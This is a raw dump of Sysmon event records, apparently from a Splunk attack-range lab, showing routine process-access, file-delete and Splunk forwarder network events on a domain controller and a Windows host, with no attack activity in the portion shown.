08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.932{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:40.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6D89661AC40D14845DE4863A7E52BF,SHA256=00D658B8C0D40E7F8B338C4F4529E133EDAAF7D3D86831497C218A5B0EDF86CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084155Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:40.348{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E5D4021EC346DB0536BECFED908428,SHA256=C36E21FB085BE6742D32ACBBEB65B6F2EB7907E079741F10C5BDAF8513761FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:41.779{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49411FD8C29F448E6CDB6AF7979977E,SHA256=0DDFA750118CD19B576A1AC6DD74BE941B07DAD316224FD7402C24E50F745931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084157Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:41.489{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4E9FF46A5A7823D274FAD1F2427C2A,SHA256=E52600D68608C7CFC25DD782F304CF889F3A1A0EFDF3419911856B7F8DD44C48,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084156Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:38.642{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50215-false10.0.1.12-8000- 23542300x8000000000000000108660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:42.800{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27E77D4C3CEF10E9BC213ECDE34C1617,SHA256=A062C4B5C94A4EC06B5940D2AF32392C49BA3DB607F91119FD7957BC0C539B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084158Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:42.692{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3E5A7E66FB89509A7BA51E13DA2202,SHA256=521A615A0CF36D80AAE3803D2D51DEEDED767A0E4565673CA93DDC2F3946EA52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:43.831{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A484DC3789B028047FCE19D6C192445,SHA256=836046AFB3A81D27F8641A0B76B1CA49646F1BF25863C9331F86B5D9F3598EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084159Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:43.708{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E18FEA95808E4BA9005F3FCCF8EABFB,SHA256=B1AC5DA972E0F9A8B94ADA2904AE585E8518732E2362D3BA183C0279A42F08EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:43.718{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-037MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:44.846{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7936BF34104347B57FC2740B1ECCA825,SHA256=C46B23951A62785342D519A50CE461011D4F1A870C3D80BC5181184F0C0D5DAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084160Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:44.708{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08B9D203A9E228D64CB7B04CBB3B5B2A,SHA256=7598F3F7B558CCAC84EFB9813F721297E00D5E8074F1972EEB4185F981A09B81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:44.731{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-038MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:45.861{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71515BF486F31FD5B18FCBD4C1F0B017,SHA256=1EB9D9F7BE37CCFBF2EA22F3518EC8D847A436A2D80DFA54BB1F7997B576AEB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084161Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:45.708{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1986D871561D35D6F1B71A595BBE948,SHA256=82690B8DFEF56E259B32DFF05C550A3ACF6F2E8E3A8AF1BADA511C52904362D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:46.878{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC163F29E074A50ECD563992BDDCFEB,SHA256=995515BF22982E9CC2AA4D5440DF923A74C906139B5B129B77F33F0DC449D083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084163Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:46.708{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8F4583146F2F4BE383FD3D7EB5EDC9F,SHA256=502A275C5D22EAE1468E2215E0EE05CA4E9BE392B61EE3365D08CF1B57B64688,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:44.424{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51981-false10.0.1.12-8000- 354300x800000000000000084162Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:43.752{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50216-false10.0.1.12-8000- 23542300x8000000000000000108668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:47.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5ECFF23B7F5003CA7411EFB0E65B32B,SHA256=4670AB89237C9DCF7744AF48D00F1715B265F5CAFC2FE19B414CFD2672E7948D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084164Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:47.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8221C30DCFDEC332C4D7EB18A8C48D1E,SHA256=CAEAACB17B3082BE0471D34C086B2AF6CE464B0D4899A976E85AAA05F6031F0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084165Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:48.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0969A666DEB20DF8B0144288F22986A9,SHA256=8069F2E288F960975B3F0852B82FC9E92C8C9FCD467128BD5959E57D50FE83E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:48.943{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1BE0854621F86B943FA1604A03C6AC5,SHA256=A6DACF54452E251CDE36D499D127D387BC7C02C34F117941103E57BC77EEEC5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:49.957{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2B6ED447DAF1CC3E921BA1F44FDF63A,SHA256=949D3D9C1F79B8C887B3C4BF97649DD2AA8F9921FBBC8DEC5C443449862CF1BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084166Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:49.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE2F4E6A150DAA98E35D191A65FDAD0B,SHA256=2214E1756081E5EDF8F7C5187373EE51E6D8B4FE53C18F474876B2A079C90F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:50.975{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BDFBAA865F6F65FF53B12ECEFAD6ABC,SHA256=1C25E036FAFA294729B4A812F02D93E6EE85A3DCAF8C47B5E09E75B31FB5FBE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084167Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:50.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87EA5C2694AAD0CEF139846677A25BED,SHA256=990340B9A60C3A84264E5331460FED271BDFA82FF9B181A4D8089A33F628B54F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084169Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:51.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B671B590BAFC07308A43DCECAF56BB3F,SHA256=35F29D98D4CB45A0562A511D1CE1A03827CC911C8770D983652FBC2B976377E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:51.993{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9812516C9A71D538E9CEEABE8A453C80,SHA256=37B03FF011BBD0E3D0222238DE1915C71AB52B377768D3209A9AC5C27EB1B608,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084168Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:49.643{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50217-false10.0.1.12-8000- 23542300x800000000000000084170Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:52.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9FF2DE0BB5FEA5946A4AF49E9BA6F4,SHA256=FB95B2812D6B4F7CCE269F2DF9363C7E919F8659F202DEBD5BA6A8E8C45B2C82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:52.426{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\18284MD5=433E6FB1FBD2B75DA46111245BE15274,SHA256=A39A447D85A36E41B166294CB88AC700A8E0DC394BBB29927166BCC0EF279842,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:50.304{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51982-false10.0.1.12-8000- 23542300x800000000000000084171Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:53.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243C86935C608B09871EA6B324A2BA25,SHA256=2639754F1430AD886250D7178E2B3627D2F8490038FF1BA3F228CDB9E27CD2B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:53.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F0A57A5381334E0E0086022DD93A55,SHA256=C2BFED59852261DBD6A3908482C22165DAA98D1A5C0FE7C27F0D3DAB92AD7AC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084172Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:54.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=538F10CFB6DA861DB7F29E73E0D4B410,SHA256=3E544FC27C766462F59B4C76B884E19DE93234399CFF67D78B810C3A34CAE203,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:54.026{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E945FAA3DAC489E1CC6710B544AC770D,SHA256=7BA06E42D92A7AED08F125ACBF07B0DE96303288EBDBCA75022A03ED5843EEA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084173Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:55.739{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D70F734B418D40517448548CABE061,SHA256=E10998C73A73B60784478A3A16A1A945313C29069E1ACD08EF4604EB5383BFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:55.056{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233B9E306D6EE7BC04143A73692B60C1,SHA256=8E27579A2D703AB7A6FFFFDDD8CD2470AF72C73C5C0AD30EEC23E412CCF23355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084174Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:56.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT 